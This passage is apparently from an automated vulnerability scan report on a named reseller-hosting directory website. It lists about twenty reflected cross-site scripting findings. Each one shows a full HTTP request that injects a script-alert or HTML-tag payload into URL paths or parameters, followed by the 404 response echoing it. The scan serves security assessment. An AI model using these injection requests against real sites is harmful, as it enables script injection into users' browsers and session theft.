<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/search.php7a83d<script>alert(1)</script>865fa517da?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3636. http://www.resellerbase.com/detail/7/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 60fb9<a>b3d01599060 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/search.php?keyword=search...&Submit3=Search60fb9<a>b3d01599060&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/search.php?keyword=search...&Submit3=Search60fb9<a>b3d01599060&opt=2 was not found on this server.</p>
...[SNIP]...

2.3637. http://www.resellerbase.com/detail/7/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 5f5c5<a>3dfb6db11ad was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/search.php?keyword=search...5f5c5<a>3dfb6db11ad&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/search.php?keyword=search...5f5c5<a>3dfb6db11ad&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3638. http://www.resellerbase.com/detail/7/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 89e74<script>alert(1)</script>50b0816cb9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/search.php?keyword=search...&Submit3=Search&opt=2&89e74<script>alert(1)</script>50b0816cb9d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/search.php?keyword=search...&Submit3=Search&opt=2&89e74<script>alert(1)</script>50b0816cb9d=1 was not found on this server.</p>
...[SNIP]...

2.3639. http://www.resellerbase.com/detail/7/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 2ffa8<a>63c44135ddf was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/search.php?keyword=search...&Submit3=Search&opt=22ffa8<a>63c44135ddf HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/search.php?keyword=search...&Submit3=Search&opt=22ffa8<a>63c44135ddf was not found on this server.</p>
...[SNIP]...

2.3640. http://www.resellerbase.com/detail/8/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d6c98<script>alert(1)</script>fe099c9d811 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild6c98<script>alert(1)</script>fe099c9d811/8/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild6c98<script>alert(1)</script>fe099c9d811/8/ was not found on this server.</p>
...[SNIP]...

2.3641. http://www.resellerbase.com/detail/8/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 41ac5<script>alert(1)</script>5c3683e9746 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/841ac5<script>alert(1)</script>5c3683e9746/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/841ac5<script>alert(1)</script>5c3683e9746/ was not found on this server.</p>
...[SNIP]...

2.3642. http://www.resellerbase.com/detail/8/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 26443<script>alert(1)</script>af687b31670 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/?26443<script>alert(1)</script>af687b31670=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

2.3643. http://www.resellerbase.com/detail/8/hostcentric-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/hostcentric-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 429ca<script>alert(1)</script>df098698d7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail429ca<script>alert(1)</script>df098698d7b/8/hostcentric-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail429ca<script>alert(1)</script>df098698d7b/8/hostcentric-com.html was not found on this server.</p>
...[SNIP]...

2.3644. http://www.resellerbase.com/detail/8/hostcentric-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/8/hostcentric-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8d654<a>eb2b72d9659 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/88d654<a>eb2b72d9659/hostcentric-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/hot.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/88d654<a>eb2b72d9659/hostcentric-com.html was not found on this server.</p>
...[SNIP]...

2.3645. http://www.resellerbase.com/detail/8/hostcentric-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/hostcentric-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5fa2c<script>alert(1)</script>dd433a592a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/5fa2c<script>alert(1)</script>dd433a592a2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/5fa2c<script>alert(1)</script>dd433a592a2 was not found on this server.</p>
...[SNIP]...

2.3646. http://www.resellerbase.com/detail/8/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d06cc<script>alert(1)</script>55f0474fb6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild06cc<script>alert(1)</script>55f0474fb6a/8/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild06cc<script>alert(1)</script>55f0474fb6a/8/rating.php was not found on this server.</p>
...[SNIP]...

2.3647. http://www.resellerbase.com/detail/8/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 849a0<script>alert(1)</script>2cb195251b0529481 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail849a0<script>alert(1)</script>2cb195251b0529481/8/rating.php?id=8&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail849a0<script>alert(1)</script>2cb195251b0529481/8/rating.php?id=8&rating=5 was not found on this server.</p>
...[SNIP]...

2.3648. http://www.resellerbase.com/detail/8/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7dd86<script>alert(1)</script>abd1a76dd7c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/87dd86<script>alert(1)</script>abd1a76dd7c/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/87dd86<script>alert(1)</script>abd1a76dd7c/rating.php was not found on this server.</p>
...[SNIP]...

2.3649. http://www.resellerbase.com/detail/8/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 96eed<script>alert(1)</script>56396eb92a58b766d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/896eed<script>alert(1)</script>56396eb92a58b766d/rating.php?id=8&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/896eed<script>alert(1)</script>56396eb92a58b766d/rating.php?id=8&rating=5 was not found on this server.</p>
...[SNIP]...

2.3650. http://www.resellerbase.com/detail/8/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1e9ee<script>alert(1)</script>21ce79ee91b51654b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/8/rating.php1e9ee<script>alert(1)</script>21ce79ee91b51654b?id=8&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/rating.php1e9ee<script>alert(1)</script>21ce79ee91b51654b?id=8&rating=5 was not found on this server.</p>
...[SNIP]...

2.3651. http://www.resellerbase.com/detail/8/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d405e<script>alert(1)</script>229ebb9f6a8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/rating.phpd405e<script>alert(1)</script>229ebb9f6a8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/rating.phpd405e<script>alert(1)</script>229ebb9f6a8 was not found on this server.</p>
...[SNIP]...

2.3652. http://www.resellerbase.com/detail/8/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4af03<script>alert(1)</script>71919995622773e98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/8/rating.php/4af03<script>alert(1)</script>71919995622773e98?id=8&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/rating.php/4af03<script>alert(1)</script>71919995622773e98?id=8&rating=5 was not found on this server.</p>
...[SNIP]...

2.3653. http://www.resellerbase.com/detail/8/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9da6a<script>alert(1)</script>f3b953a1df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/rating.php?9da6a<script>alert(1)</script>f3b953a1df=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/rating.php?9da6a<script>alert(1)</script>f3b953a1df=1 was not found on this server.</p>
...[SNIP]...

2.3654. http://www.resellerbase.com/detail/8/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2d1e3<script>alert(1)</script>a6d3aafe94a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2d1e3<script>alert(1)</script>a6d3aafe94a/8/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2d1e3<script>alert(1)</script>a6d3aafe94a/8/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

